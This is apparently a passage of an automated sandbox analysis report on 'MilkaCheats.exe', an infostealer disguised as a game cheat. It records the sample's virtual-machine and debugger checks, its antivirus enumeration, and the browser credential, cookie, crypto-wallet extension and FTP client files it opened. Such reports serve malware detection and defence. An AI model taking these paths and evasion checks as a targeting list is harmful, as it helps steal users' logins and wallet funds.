              Source: MilkaCheats.exe, 00000001.00000002.1848395056.00000000012F3000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1688344395.00000000012F3000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1847826602.00000000012F3000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1847565217.00000000012F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: MilkaCheats.exe, 00000001.00000002.1848284074.00000000012BD000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1847565217.00000000012BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.4.drBinary or memory string: vmci.sys
              Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
              Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.4.drBinary or memory string: VMware20,1
              Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: MilkaCheats.exe, 00000001.00000002.1848395056.00000000012F3000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1688344395.00000000012F3000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1847826602.00000000012F3000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1847565217.00000000012F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,|
              Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Users\user\Desktop\MilkaCheats.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\MilkaCheats.exeProcess queried: DebugPort
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000C511C LdrInitializeThunk,0_2_000C511C
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000CB4F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000CB4F3
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000C59D6 mov edi, dword ptr fs:[00000030h]0_2_000C59D6
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000D951A mov eax, dword ptr fs:[00000030h]0_2_000D951A
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000D18CF mov ecx, dword ptr fs:[00000030h]0_2_000D18CF
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000C59D6 DeleteFileA,VirtualProtect,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,GetStdHandle,WriteConsoleA,GetProcessHeap,HeapFree,0_2_000C59D6
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000C7479 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_000C7479
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000C777F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000C777F
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000C790C SetUnhandledExceptionFilter,0_2_000C790C

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\MilkaCheats.exeMemory written: C:\Users\user\Desktop\MilkaCheats.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\MilkaCheats.exeProcess created: C:\Users\user\Desktop\MilkaCheats.exe "C:\Users\user\Desktop\MilkaCheats.exe"
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: GetLocaleInfoW,0_2_000DE1A7
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_000DE2D0
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: GetLocaleInfoW,0_2_000DE3D6
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_000DE4A5
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: EnumSystemLocalesW,0_2_000D54FD
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: GetLocaleInfoW,0_2_000D59C6
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_000DDB41
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: EnumSystemLocalesW,0_2_000DDDE3
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: EnumSystemLocalesW,0_2_000DDE2E
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: EnumSystemLocalesW,0_2_000DDEC9
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_000DDF54
              Source: C:\Users\user\Desktop\MilkaCheats.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\MilkaCheats.exeCode function: 0_2_000C7679 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_000C7679
              Source: C:\Users\user\Desktop\MilkaCheats.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: MilkaCheats.exe, 00000001.00000003.1794270469.00000000039D5000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1847565217.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1794077852.000000000136C000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000002.1848284074.00000000012CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
              Source: C:\Users\user\Desktop\MilkaCheats.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: MilkaCheats.exe PID: 6428, type: MEMORYSTR
              Source: Yara match File source: sslproxydump.pcap, type: PCAP
              Source: MilkaCheats.exe String found in binary or memory: Wallets/Electrum
              Source: MilkaCheats.exe String found in binary or memory: Wallets/ElectronCash
              Source: MilkaCheats.exe String found in binary or memory: Jaxx Liberty
              Source: MilkaCheats.exe String found in binary or memory: window-state.json
              Source: MilkaCheats.exe String found in binary or memory: ExodusWeb3
              Source: MilkaCheats.exe, 00000001.00000002.1848395056.00000000012F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
              Source: MilkaCheats.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: MilkaCheats.exe String found in binary or memory: keystore
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
              Source: C:\Users\user\Desktop\MilkaCheats.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
